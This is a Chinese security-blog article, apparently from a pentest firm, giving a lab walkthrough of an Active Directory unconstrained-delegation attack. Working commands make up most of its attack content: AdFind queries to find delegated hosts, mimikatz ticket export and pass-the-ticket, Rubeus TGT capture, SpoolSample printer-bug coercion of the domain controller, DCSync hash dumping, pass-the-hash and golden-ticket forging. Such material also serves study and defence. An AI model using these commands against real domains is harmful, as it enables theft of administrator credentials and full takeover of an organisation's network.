网易首页 > 网易号 > 正文 申请入驻

【技术分享】非约束委派

0
分享至

前言:

域委派是指将域内用户的权限委派给服务账户,使得服务账户能以用户的权限在域内开展活动。委派主要分为非约束委派和约束委派两种方式,还有一种是基于资源的约束委派。本篇文章,小星将和大家分享非约束委派的利用过程。

01非约束委派流程

非约束委派的请求过程如图,当service1的服务账号开启了非约束委派后,user访问service1时,service1会将user的TGT保存到内存中,然后service1就可以利用TGT以user的身份访问去访问域中的任何user可以访问的服务。

详细的流程可以查看微软手册。

链接如下:[MS-SFU]: Protocol Overview | Microsoft Learn

02非约束委派攻击流程
域环境

当前域:test.com

域控:dc-2016(IP:10.10.90.10) test\administrator

域内主机(配置了非约束委派):

web-2016(IP:10.10.90.20)test\mssql

1. 配置和查找非约束委派主机:在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通⽤户默认是不含此功能。现在我们将web-2016这个主机⽤户设置为非约束委派。

2. 查找域内非约束委派用户和计算机:

#查找域中配置非约束委派的用户,过滤出cn和distinguishedName属性。

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

#查找域中配置非约束委派的主机,过滤出cn和distinguishedName属性。

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

3. 查询主机web-2016,发现被设置了非约束委派。使⽤dc或者域管去登录 web-2016,可在 web-2016上留存票据凭证,随后让域控模拟访问被设置了⾮约束委派的机器。

Enter-PSSession -ComputerName web-2016

4. 域控模拟访问被设置了约束委派的机器后,此时域管理员的 TGT 已经缓存在 web-2016机器上了,域管的凭证也已缓存于⽬标机器。使⽤域内机器登录本地管理员,导出相关凭证、清除⼀下当前票据缓存。

mimikatz.exe "privilege::debug" "kerberos::purge" "exit"

5.使⽤mimikatz以dump所有票据。

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

6.此时[0;47cb77]-2-0-60a10000-Administrator@krbtgt-TEST.COM.kirbi就是域管理员administrator的TGT。

7.访问域控文件失败。

8. 使用mimikatz通过ptt将TGT注入到当前会话中。

kerberos::ptt [0;47cb77]-2-0-60a10000-Administrator@krbtgt-TEST.COM.kirbi

9.成功访问域控。

03非约束委派+Spooler打印机服务

一般情况下,高权限用户是不会主动访问我们的,所以说上述情况出现机率较少。在特定情况下,我们可以利用splooer服务让域控主动连接。

默认开启Splooer服务,域用户可以利用windows打印系统远程协议(MS-RPRN)来强制任何运行了Splooer服务的域内机器,通过kerberos或ntlm对任何目标进行身份验证,这就是该攻击方式的原理。

1.如下所示,Splooer服务默认是已开启,并以system权限运行。

2.在web-2016上以本地管理员身份运行Rubeus,对域控机器账户的登录进行监听。

Rubeus.exe monitor /interval:1 /filteruser:dc-2016$

#我们可以用Rubeus来监听EvevtID为4624的时间,这样可以第一时间截取到TGT

# /interval:1 设置监听时间为1秒

# /filteruser 监听对象为域控,注意后面有$,如果不设置监听对象就监听所有的TGT

#dc-2016$为域控主机的名字加$

注意:Rubeus.exe需要以本地管理员身份运行,否则会报错。

3.利用SpoolSample工具强制让域控(dc-2026)向本机(web-2016)验证身份。

SpoolSample.exedc-2016 web-2016

这里要注意非约束委派机器是需要关闭防火墙,否则以域用户的身份执行SpoolSample.exe会返回下述错误,无法接收到tickets。

4.关闭防火墙后再次运行。

5.切换到web-2016本地管理员,Rubeus已经捕获到了域控的TGT。该TGT是base64的,有两种方法可以导入到内存中。此处base64字符串导入票据需要进行处理,去除空格和换行符\n

方法1:

1.使用powershell的base64转换功能。

[IO.File]::WriteAllBytes("dc-2016.kirbi",[Convert]::FromBase64String("捕获到的base64编码"))

2. 执行命令后,会在当前目录下生成dc-2016.kirbi票据,使用mimikatz导入票据即可。

kerberos::ptt dc-2016.kirbi

kerberos::list

方法2:

1.使用Rubeus导入TGT。

Rubeus.exe ptt /ticket:base64

2. 查看票据,此时票据已经成功写入到内存中,但是依然无法访问域控的文件。

3.此处生成的 TGT,相当于域控真正赋予了我们administrator本地管理员权限,所以此处我们可以使用命令来导出域内账号hash。

4. 以本地管理员权限运行mimikatz进行dcsync,成功获取域内账号ntlm哈希值。

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

5.如果当前用户拥有管理员权限,我们可以使用PTH攻击。

mimikatz.exe"privilege::debug""sekurlsa::pth/user:administrator/domain:test.com/ntlm:0ebc63860c8167877a03a68df53b3bf1"

#成功后会弹出一个cmd窗口,此时和域控制器建立ipc无需密码

6. 如果是普通的域用户,可使用黄金票据,

mimikat.exe "kerberos::golden /user:administrator /domain:test.com /sid:S-1-5-21-1348005725-2953300805-2723764712 /krbtgt:61e6be9a1ae07871c40cbd8e18181128 /ptt"

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
俄乌交换阵亡官兵遗体,48换502,再次凸显双方阵亡人数巨大差异

俄乌交换阵亡官兵遗体,48换502,再次凸显双方阵亡人数巨大差异

彼得堡的肥天鹅
2024-12-04 00:56:58
即将重返白宫的特朗普更没想到!马斯克想了三天三夜也想不明白

即将重返白宫的特朗普更没想到!马斯克想了三天三夜也想不明白

玲子日记
2024-12-04 15:36:12
接生琼瑶的成都护士曾回忆:她有5斤多重,遗憾未能再见一面

接生琼瑶的成都护士曾回忆:她有5斤多重,遗憾未能再见一面

红星新闻
2024-12-04 21:17:16
赵薇消失3年发文「悼念恩师琼瑶」!悲痛:青山依旧在几度夕阳红

赵薇消失3年发文「悼念恩师琼瑶」!悲痛:青山依旧在几度夕阳红

ETtoday星光云
2024-12-04 17:27:32
琼瑶自杀去世!生前安排好一切,遗书直言此生无憾,最后露面曝光

琼瑶自杀去世!生前安排好一切,遗书直言此生无憾,最后露面曝光

萌神木木
2024-12-04 15:27:22
车检要实行OBD检测,评论区炸锅,车友们纷纷晒出了检测经历

车检要实行OBD检测,评论区炸锅,车友们纷纷晒出了检测经历

蜉蝣说
2024-12-04 10:53:35
明年开始,定期存款“超20万”的家庭,将不得不面对“三大麻烦”

明年开始,定期存款“超20万”的家庭,将不得不面对“三大麻烦”

巢客HOME
2024-12-04 11:15:03
浙江狂轰159分:狂胜吉林47分+单节50分+替补109分 刷爆纪录

浙江狂轰159分:狂胜吉林47分+单节50分+替补109分 刷爆纪录

醉卧浮生
2024-12-04 21:51:25
死磕大马力混动,福特为谁而倔强?

死磕大马力混动,福特为谁而倔强?

车业杂谈
2024-12-04 18:18:01
一夜之间,全国2500万新能源车主坐不住了,到底咋了?

一夜之间,全国2500万新能源车主坐不住了,到底咋了?

慧翔百科
2024-12-04 12:29:42
58岁的温碧霞,真的是个谜!好像全世界就只有她不知道自己老了

58岁的温碧霞,真的是个谜!好像全世界就只有她不知道自己老了

木子爱娱乐大号
2024-12-03 16:43:48
本周重大事件:美国总统拜登对儿子进行赦免,俄罗斯对中国家具配件加征55.65%关税

本周重大事件:美国总统拜登对儿子进行赦免,俄罗斯对中国家具配件加征55.65%关税

每周财经连连看
2024-12-04 19:30:42
作家琼瑶去世,五天前发文,回忆亡夫,暗示对方子女对自己不孝!

作家琼瑶去世,五天前发文,回忆亡夫,暗示对方子女对自己不孝!

阿刁Adiao
2024-12-04 19:26:44
网友算了笔账:假如孩子上国际学校,12年要花540万,若出国留学至少要准备1000万!

网友算了笔账:假如孩子上国际学校,12年要花540万,若出国留学至少要准备1000万!

西虹市闲话
2024-12-04 21:16:13
广州白云机场进境旅客用行李箱携带百万美金被查!现场曝光

广州白云机场进境旅客用行李箱携带百万美金被查!现场曝光

南方都市报
2024-12-04 19:23:17
2025春晚官宣:网友吐槽不断,春晚不是老百姓看的?到底咋回事?

2025春晚官宣:网友吐槽不断,春晚不是老百姓看的?到底咋回事?

眼光很亮
2024-12-04 13:00:22
惊心动魄的6个小时!就在昨晚,中国刚刚躲过一场战争

惊心动魄的6个小时!就在昨晚,中国刚刚躲过一场战争

沧海一书客
2024-12-04 13:56:29
对中国公民,日本或放宽签证要求

对中国公民,日本或放宽签证要求

环球时报新闻
2024-12-04 19:24:14
19岁网红机车女骑手海南遇车祸去世,交警回应!因避让摔车

19岁网红机车女骑手海南遇车祸去世,交警回应!因避让摔车

南方都市报
2024-12-04 20:16:18
0-4完败!泰山遭川崎复仇,本赛季3战日本球队0胜+跌出亚冠晋级区

0-4完败!泰山遭川崎复仇,本赛季3战日本球队0胜+跌出亚冠晋级区

我爱英超
2024-12-04 19:54:40
2024-12-04 23:59:00
星云博创
星云博创
星云博创-专业安全服务提供商
90文章数 12关注度
往期回顾 全部

科技要闻

被字节起诉的实习生,写了AI顶会最佳论文

头条要闻

媒体:尹锡悦遭"众叛亲离" 美国现在最怕尹锡悦政权灭亡

头条要闻

媒体:尹锡悦遭"众叛亲离" 美国现在最怕尹锡悦政权灭亡

体育要闻

哈登,我不做大哥好多年

娱乐要闻

琼瑶在家中自杀离世,千字遗书曝光

财经要闻

牛市的悲歌

汽车要闻

表现够全能 柴油版二代哈弗H9或许更适合家用

态度原创

数码
本地
时尚
亲子
游戏

数码要闻

内置屏幕的 HomePod 预计将于 2025 年底推出

本地新闻

云游中国|来伦布夏果感受充满Passion的人生

今冬这三双鞋火了!洋气巨显腿长,谁穿谁好看!

亲子要闻

关于“我们家没有狗,却有很多狗粮”这回事

在城市里横冲直撞的野猪,才是真正的“怪物猎人”

无障碍浏览 进入关怀版